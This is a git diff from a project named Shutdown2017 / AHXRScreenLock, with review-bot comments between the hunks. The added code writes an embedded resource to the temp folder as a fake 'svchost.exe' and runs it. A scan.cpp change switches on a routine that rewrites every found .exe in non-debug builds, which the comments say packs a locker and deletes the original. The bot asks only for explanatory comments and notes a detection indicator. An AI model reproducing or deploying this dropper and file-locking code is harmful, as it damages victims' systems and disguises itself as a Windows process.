+ if (it_dir->path().filename().extension() == ".exe") { + i_dir_count++; + if (!b_first) + i_old_dir_count++; + } + + it_dir++; + } + catch (const std::exception & ex) { + std::cout << it_dir->path().filename() << " " << ex.what() << std::endl; + } + } + b_new_generated = (i_dir_count != i_old_dir_count); + i_old_dir_count = i_dir_count; + b_first = true; + Sleep(5000); + } + } + return 0; +} + +DWORD WINAPI t_payload(LPVOID lpParameter) { + + h_shutdown = CreateThread(0, 0, t_shutdown, 0, 0, &dw_payload); + + + HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + TCHAR tmpPath[MAX_PATH]; + GetTempPath(MAX_PATH, tmpPath); + + std::string s_extract; + s_extract = tmpPath; + s_extract += "svchost.exe"; + + std::fstream f; + + f.open(s_extract, std::ios::out | std::ios::binary); + f.write((char*)pResourceLock, i_resource); + f.close(); + + STARTUPINFO info = { sizeof(info) }; + PROCESS_INFORMATION processInfo; + CreateProcess(s_extract.c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo); +/* + if (CreateProcess(s_extract.c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo)) + { + WaitForSingleObject(processInfo.hProcess, INFINITE); + CloseHandle(processInfo.hProcess); + CloseHandle(processInfo.hThread); + }*/ + return 0; +} \ No newline at end of file diff --git a/src/shutdown2017/payload.h b/src/shutdown2017/payload.h new file mode 100644 index 0000000..7bb40f2 --- /dev/null +++ b/src/shutdown2017/payload.h 
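Review bot: t_payload() in the new payload.cpp has no comment stating that it writes the embedded IDR_RCDATA1 resource to `svchost.exe` in the GetTempPath() directory and starts it with CreateProcess, which is the behaviour a defender would key on. A process named svchost.exe whose image path is the user's temp directory, and whose parent is this program, is a simple indicator to hunt for. A header comment such as `// Drops the embedded payload as <temp dir>\svchost.exe and launches it as a child process` would record that for reviewers and detection authors. The hunk adds the whole file.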
@@ -0,0 +1,34 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include +#include + +#define SHUTDOWN_FOLDER_NAME "Shutdown2017" + +extern HANDLE h_payload; +extern DWORD dw_payload; +extern bool b_new_generated; +extern std::string s_documents_path; +extern DWORD WINAPI t_payload(LPVOID lpParameter); + +#define START_PAYLOAD() {h_payload = CreateThread(0, 0, t_payload, 0, 0, &dw_payload);} \ No newline at end of file diff --git a/src/shutdown2017/resource.h b/src/shutdown2017/resource.h index d332a87..d00fc32 100644 Binary files a/src/shutdown2017/resource.h and b/src/shutdown2017/resource.h differ diff --git a/src/shutdown2017/scan.cpp b/src/shutdown2017/scan.cpp index 61c64e4..db0a654 100644 --- a/src/shutdown2017/scan.cpp +++ b/src/shutdown2017/scan.cpp @@ -75,7 +75,7 @@ DWORD WINAPI t_startComputerScan(LPVOID lpParameter) { if (it_dir->path().filename().extension() == ".exe") { // Only list .exe files. v_files.push_back(it_dir->path().string()); #ifndef DEBUG - // lockdownFile(it_dir->path().string()); + lockdownFile(it_dir->path().string()); #endif } }
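Review bot: In the scan.cpp hunk, uncommenting `lockdownFile(it_dir->path().string());` inside `#ifndef DEBUG` makes every non-DEBUG build modify each .exe the scan lists, and nothing in the hunk documents that this is now the destructive path. Judging by the context lines of the lockdown.cpp hunk, lockdownFile() builds and packs a locker, attaches the executable and then removes the old .exe, so the effect on a host is a mass rewrite of executables under the scanned directories. I would put `// Non-DEBUG builds only: rewrites the discovered executable via lockdownFile(); DEBUG builds only list it` on the line before the call. t_startComputerScan starts and ends outside the hunk.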